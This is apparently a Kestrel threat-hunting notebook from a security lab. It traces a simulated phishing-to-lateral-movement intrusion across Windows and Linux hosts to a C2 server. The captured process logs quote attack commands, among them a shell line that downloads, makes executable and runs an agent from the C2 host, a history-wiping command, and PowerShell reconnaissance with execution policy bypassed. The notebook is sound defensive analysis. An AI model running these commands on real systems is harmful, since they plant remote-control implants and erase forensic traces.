## Threat Hypothesis

- An attacker may get initial footprint on `192.168.56.111` via phishing
- The attacker may conduct unknown malicious activities
- The attacker may lateral-move to other Windows machines with weak password
- The attacker may lateral-move to Linux servers with vulnerabilities
    
## Hunting Tasks

1. Check `192.168.56.111` (Windows) for successful attack led by phishing activities
2. Reveal malicious activities on `192.168.56.111`
3. Figure out which Window machine the attacker may lateral move to
4. Reveal malicious activities on lateral-moved Windows machines
5. Figure out which Linux server the attacker may exploit
6. Reveal malicious activities on lateral-moved Linux servers
7. Discover the C2 host/IP if any
8. Leave detailed or complex analysis to the next huntbook

In [1]:
# Any attack led by phishing?

phishing_candidates = GET process FROM stixshifter://bh22-windows-192.168.56.111
                      WHERE [process:parent_ref.name = 'WinMail.exe' AND process:name != 'WinMail.exe']
                      START t'2022-07-01T00:00:00Z' STOP t'2022-08-01T00:00:00Z'
                      
DISP phishing_candidates ATTR pid, name, command_line

pid 
 name 
 command_line 
 
 
 
 
 7220 
 cmd.exe 
 None 
 
 
 7220 
 cmd.exe 
 C:\Windows\system32\cmd.exe /c ""C:\Users\Alice\AppData\Local\Temp\return to office schedule.jpg.bat"" 
 
 
 6492 
 iexplore.exe 
 None 
 
 
 6492 
 iexplore.exe 
 "C:\Program Files\Internet Explorer\iexplore.exe" http://www.ibm.com/ 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 user-account* 
 x-ecs-network* 
 x-ecs-process* 
 x-ecs-source* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 phishing_candidates 
 process 
 13 
 22 
 53 
 53 
 35 
 32 
 32 
 3 
 43 
 32 
 3 
 40 
 3 
 40 
 40 
 40 
 
 
 *Number of related records cached.

In [2]:
# `return to office schedule.jpg.bat` is suspicious, let's drill down

cmd = phishing_candidates WHERE pid = 7220

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),directory*,file*,ipv4-addr*,ipv6-addr*,mac-addr*,network-traffic*,process*,user-account*,x-ecs-network*,x-ecs-process*,x-ecs-source*,x-ecs-user*,x-oca-asset*,x-oca-event*
cmd,process,4,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0


## Entity-Based Cyber Reasoning

1. Each Kestrel variable is a list of entities, e.g., processes, IP address, emails, users.
2. Human naturally think in entities (Kestrel variables) when reasoning about a campaign.
3. Kestrel runtime lifts records into entities and relations to be appliable to any data.

Reasoning upon entities, threat hunters construct a hunt-flow with dependent Kestrel variables in a hunt, e.g.:

<img src="https://kestrel.readthedocs.io/en/stable/_images/huntflow.png" alt="example of hunt-flow" width="660" align="left"/>

## Entity-Relation Resolution

We can specify the relation like `CREATED`, `CREATED BY`, `ACCEPTED`, `ACCEPTED BY`, `OWNED`, `OWNED BY` to resolve between two variables. A relation is directional, and Kestrel uses _VERB_ and _VERB BY_ in `FIND` to indicate which direction the relation is.

<img src="https://kestrel.readthedocs.io/en/stable/_images/entityrelation.png" alt="supported entity relations" width="800" align="left"/>

In [3]:
# let's check offsprings of the `cmd.exe`

cmd_activities = FIND process CREATED BY cmd

DISP cmd_activities ATTR pid, name, command_line

pid 
 name 
 command_line 
 
 
 
 
 5592 
 conhost.exe 
 None 
 
 
 5592 
 conhost.exe 
 \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 
 
 
 2476 
 powershell.exe 
 None 
 
 
 2476 
 powershell.exe 
 powershell -file C:\Users\Alice\AppData\Local\Temp\cd.ps1 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 user-account* 
 x-ecs-network* 
 x-ecs-process* 
 x-ecs-source* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 cmd_activities 
 process 
 6 
 9 
 60 
 60 
 41 
 37 
 37 
 4 
 57 
 37 
 4 
 49 
 4 
 49 
 49 
 49 
 
 
 *Number of related records cached.

In [4]:
# it's a powershell, hmm, let's go further

psh_activities = FIND process CREATED BY cmd_activities
                 START t'2022-07-01T00:00:00Z' STOP t'2022-08-01T00:00:00Z'

DISP psh_activities ATTR pid, name, command_line

pid 
 name 
 command_line 
 
 
 
 
 3124 
 splunkd.exe 
 None 
 
 
 3124 
 splunkd.exe 
 "C:\Users\Public\splunkd.exe" -server http://192.168.56.150:8888 -group red 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 user-account* 
 x-ecs-destination* 
 x-ecs-network* 
 x-ecs-process* 
 x-ecs-source* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 psh_activities 
 process 
 32 
 56 
 117 
 117 
 77 
 81 
 69 
 14 
 87 
 69 
 6 
 14 
 77 
 8 
 77 
 77 
 77 
 
 
 *Number of related records cached.

In [5]:
# even further

splunkd_activities = FIND process CREATED BY psh_activities

DISP splunkd_activities ATTR pid, name, command_line

pid,name,command_line
5788,cmd.exe,None
5788,cmd.exe,cmd.exe /C python3 --version&python2 --version&python --version
6044,conhost.exe,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1204,powershell.exe,None
1204,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""\$r1 = Invoke-WebRequest https://www.ibm.com/;\$r2 = Invoke-WebRequest https://www.blackhat.com/us-22/;\$r3 = Invoke-WebRequest https://github.com/;\$r4 = Invoke-WebRequest https://european-union.europa.eu/;\$r5 = Invoke-WebRequest https://www.japan.go.jp/;\$r1.StatusCode, \$r2.StatusCode, \$r3.StatusCode, \$r4.StatusCode, \$r5.StatusCode -join ',';"""
2012,powershell.exe,None
2012,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""\$owners = @{};gwmi win32_process |%% {\$owners[\$_.handle] = \$_.getowner().user};\$ps = get-process | select processname,Id,@{l=\""Owner\"";e={\$owners[\$_.id.tostring()]}};foreach(\$p in \$ps) { if(\$p.Owner -eq \""user\"") { \$p; }}"""
2356,powershell.exe,None
2356,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""Get-WmiObject -Class Win32_UserAccount"""
3084,powershell.exe,None


## Hunting Tasks Review

#### Completed
1. Check `192.168.56.111` (Windows) for successful attack led by phishing activities
2. Reveal malicious activities on `192.168.56.111`

#### Next
3. Figure out which Window machine the attacker may lateral move to
    - Suspicious process `6816` and `7028` (may be successful or not)
    - Same results as we matched the lateral movement TTP in the first huntbook
4. Reveal malicious activities on lateral-moved Windows machines

#### Later
5. Figure out which Linux server the attacker may exploit
6. Reveal malicious activities on lateral-moved Linux servers
7. Discover the C2 host/IP if any
8. Leave detailed or complex analysis to the next huntbook

In [6]:
# let's follow the data-flow (network-traffic) across hosts to see whether the lateral movement succeeds
# HostA[process -> network traffic (A's view)] -> [network traffic (B's view) -> process]HostB

lateral_mov_win = splunkd_activities WHERE pid = 7028

lateral_mov_win_nt = FIND network-traffic CREATED BY lateral_mov_win

DISP lateral_mov_win_nt ATTR src_ref.value, src_port, dst_ref.value, dst_port

src_ref.value 
 src_port 
 dst_ref.value 
 dst_port 
 
 
 
 
 192.168.56.111 
 50376 
 192.168.56.112 
 5985 
 
 
 192.168.56.111 
 50375 
 192.168.56.112 
 5985 
 
 
 192.168.56.111 
 50377 
 192.168.56.112 
 5985 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 user-account* 
 x-ecs-destination* 
 x-ecs-network* 
 x-ecs-process* 
 x-ecs-source* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 lateral_mov_win 
 process 
 5 
 6 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 
 
 lateral_mov_win_nt 
 network-traffic 
 3 
 3 
 146 
 147 
 100 
 91 
 91 
 6 
 151 
 91 
 3 
 9 
 131 
 9 
 131 
 131 
 131 
 
 
 *Number of related records cached.

In [7]:
# let's retrieve data from the other end---192.168.56.112

lateral_mov_112_nt = GET network-traffic FROM stixshifter://bh22-windows-192.168.56.112
                     WHERE [network-traffic:src_port = lateral_mov_win_nt.src_port]
                     # Kestrel will automatically add timestamp to uniquely identify entities like traffic

DISP lateral_mov_112_nt ATTR src_ref.value, src_port, dst_ref.value, dst_port

src_ref.value 
 src_port 
 dst_ref.value 
 dst_port 
 
 
 
 
 192.168.56.111 
 50377 
 192.168.56.112 
 5985 
 
 
 192.168.56.111 
 50375 
 192.168.56.112 
 5985 
 
 
 192.168.56.111 
 50376 
 192.168.56.112 
 5985 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 user-account* 
 x-ecs-destination* 
 x-ecs-network* 
 x-ecs-process* 
 x-ecs-source* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 lateral_mov_112_nt 
 network-traffic 
 3 
 3 
 0 
 3 
 6 
 3 
 3 
 0 
 3 
 3 
 3 
 3 
 3 
 3 
 3 
 3 
 3 
 
 
 *Number of related records cached.

In [8]:
# finally check the traffic-assocaited process on HostB

lateral_mov_112_receiver = FIND process CREATED lateral_mov_112_nt

DISP lateral_mov_112_receiver ATTR pid, name, command_line

pid 
 name 
 command_line 
 
 
 
 
 4 
 None 
 None 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 user-account* 
 x-ecs-destination* 
 x-ecs-network* 
 x-ecs-process* 
 x-ecs-source* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 lateral_mov_112_receiver 
 process 
 3 
 3 
 0 
 14 
 28 
 14 
 14 
 14 
 11 
 14 
 17 
 20 
 20 
 19 
 20 
 20 
 20 
 
 
 *Number of related records cached.

In [9]:
# This is a Windows system process (pid:4) handling WinRM
# Looks like Sysmon did not record enough information on the process, even no process name
# No need to try listing its child processes
# Let's re-read the lateral movement command line and check another indicator: splunkd.exe on 192.168.56.112

splunkd_on_112 = GET process
                 FROM stixshifter://bh22-windows-192.168.56.112
                 WHERE [process:name = 'splunkd.exe']
                 START t'2022-07-01T00:00:00Z' STOP t'2022-08-01T00:00:00Z'
                 
splunkd_activities_on_112 = FIND process CREATED BY splunkd_on_112
                 
DISP splunkd_on_112 ATTR pid, name, command_line
DISP splunkd_activities_on_112 ATTR pid, name, command_line

pid,name,command_line
4404,splunkd.exe,None
4404,splunkd.exe,C:\Users\Public\splunkd.exe -server http://192.168.56.150:8888 -group red
pid,name,command_line
4216,conhost.exe,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
764,powershell.exe,None
764,powershell.exe,powershell.exe -ExecutionPolicy Bypass -C Clear-History;Clear
3172,powershell.exe,None
3172,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""Get-SmbShare | ConvertTo-Json"""
4224,powershell.exe,None
4224,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""\$owners = @{};gwmi win32_process |%% {\$owners[\$_.handle] = \$_.getowner().user};\$ps = get-process | select processname,Id,@{l=\""Owner\"";e={\$owners[\$_.id.tostring()]}};foreach(\$p in \$ps) { if(\$p.Owner -eq \""user\"") { \$p; }}"""


## Hunting Tasks Review

#### Completed
1. Check `192.168.56.111` (Windows) for successful attack led by phishing activities
2. Reveal malicious activities on `192.168.56.111`
3. Figure out which Window machine the attacker may lateral move to
4. Reveal malicious activities on lateral-moved Windows machines

#### Next
5. Figure out which Linux server the attacker may exploit
6. Reveal malicious activities on lateral-moved Linux servers

#### Later
7. Discover the C2 host/IP if any
8. Leave detailed or complex analysis to the next huntbook

In [10]:
# process 7880 on 192.168.56.111 looks like an exploiting attempt
# similar cross-host data-flow tracking via network traffic

lateral_mov_linux = splunkd_activities WHERE pid = 7880

lateral_mov_linux_nt = FIND network-traffic CREATED BY lateral_mov_linux

DISP lateral_mov_linux_nt ATTR src_ref.value, src_port, dst_ref.value, dst_port

src_ref.value 
 src_port 
 dst_ref.value 
 dst_port 
 
 
 
 
 192.168.56.111 
 50383 
 192.168.56.91 
 80 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 user-account* 
 x-ecs-destination* 
 x-ecs-network* 
 x-ecs-process* 
 x-ecs-source* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 lateral_mov_linux 
 process 
 3 
 4 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 
 
 lateral_mov_linux_nt 
 network-traffic 
 1 
 1 
 146 
 147 
 100 
 91 
 91 
 8 
 151 
 91 
 3 
 9 
 131 
 9 
 131 
 131 
 131 
 
 
 *Number of related records cached.

In [11]:
lateral_mov_91_nt = GET network-traffic FROM stixshifter://bh22-linux-192.168.56.91
                    WHERE [network-traffic:src_port = lateral_mov_linux_nt.src_port]

DISP lateral_mov_91_nt ATTR src_ref.value, src_port, dst_ref.value, dst_port

linux_proc = FIND process CREATED lateral_mov_91_nt

DISP linux_proc ATTR pid, name, command_line

src_ref.value 
 src_port 
 dst_ref.value 
 dst_port 
 
 
 
 
 192.168.56.111 
 50383 
 172.17.0.2 
 80 
 
 
 
 
 
 
 pid 
 name 
 command_line 
 
 
 
 
 13364 
 node 
 /usr/local/bin/node app.js 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 user-account* 
 x-ecs-destination* 
 x-ecs-file* 
 x-ecs-network* 
 x-ecs-process* 
 x-ecs-source* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 lateral_mov_91_nt 
 network-traffic 
 1 
 2 
 138 
 138 
 154 
 0 
 0 
 41 
 152 
 72 
 46 
 2 
 46 
 76 
 46 
 76 
 76 
 76 
 
 
 linux_proc 
 process 
 72 
 72 
 138 
 138 
 154 
 0 
 0 
 42 
 80 
 72 
 46 
 2 
 46 
 76 
 46 
 76 
 76 
 76 
 
 
 *Number of related records cached.

In [12]:
# Remember the NodeJS exploit we detected in the first huntbook?
# Let's check if this is it

node_children = FIND process CREATED BY linux_proc
                START t'2022-07-01T00:00:00Z' STOP t'2022-08-01T00:00:00Z'

DISP node_children ATTR pid, name, command_line

node_grand_children = FIND process CREATED BY node_children

DISP node_grand_children ATTR pid, name, command_line

pid,name,command_line
13975,node,/usr/local/bin/node app.js
13975,sh,"/bin/sh -c curl -s -X POST -H ""file:sandcat.go"" -H ""platform:linux"" http://192.168.56.150:8888/file/download > splunkd;chmod +x splunkd;./splunkd -server http://192.168.56.150:8888 -group red -v"
13975,splunkd,/usr/local/src/starx/splunkd -server http://192.168.56.150:8888 -group red -v
pid,name,command_line
13977,chmod,/bin/chmod +x splunkd
13976,curl,/usr/bin/curl -s -X POST -H file:sandcat.go -H platform:linux http://192.168.56.150:8888/file/download
14089,groups,/usr/bin/groups
13976,sh,"/bin/sh -c curl -s -X POST -H ""file:sandcat.go"" -H ""platform:linux"" http://192.168.56.150:8888/file/download > splunkd;chmod +x splunkd;./splunkd -server http://192.168.56.150:8888 -group red -v"
13977,sh,"/bin/sh -c curl -s -X POST -H ""file:sandcat.go"" -H ""platform:linux"" http://192.168.56.150:8888/file/download > splunkd;chmod +x splunkd;./splunkd -server http://192.168.56.150:8888 -group red -v"
13982,sh,/bin/sh -c > \$HOME/.bash_history && unset HISTFILE


## Hunting Tasks Review

#### Completed
1. Check `192.168.56.111` (Windows) for successful attack led by phishing activities
2. Reveal malicious activities on `192.168.56.111`
3. Figure out which Window machine the attacker may lateral move to
4. Reveal malicious activities on lateral-moved Windows machines
5. Figure out which Linux server the attacker may exploit
6. Reveal malicious activities on lateral-moved Linux servers

#### Next
7. Discover the C2 host/IP if any
    - The command line suggests http://192.168.56.150:8888 may be the C2 URL
    - We can pull out the network traffic to verify the destination
    - We will check the beaconing behavior in the next huntbook
8. Leave detailed or complex analysis to the next huntbook

In [13]:
c2_traffic = FIND network-traffic CREATED BY node_grand_children

DISP c2_traffic ATTR src_ref.value, src_port, dst_ref.value, dst_port

src_ref.value 
 src_port 
 dst_ref.value 
 dst_port 
 
 
 
 
 172.17.0.2 
 38550 
 192.168.56.2 
 3128 
 
 
 172.17.0.2 
 49726 
 192.168.56.150 
 8888 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 user-account* 
 x-ecs-destination* 
 x-ecs-file* 
 x-ecs-network* 
 x-ecs-process* 
 x-ecs-source* 
 x-ecs-user* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 c2_traffic 
 network-traffic 
 2 
 4 
 2029 
 2153 
 1548 
 0 
 0 
 195 
 3872 
 1166 
 243 
 34 
 243 
 1936 
 243 
 1936 
 1936 
 1936 
 
 
 *Number of related records cached.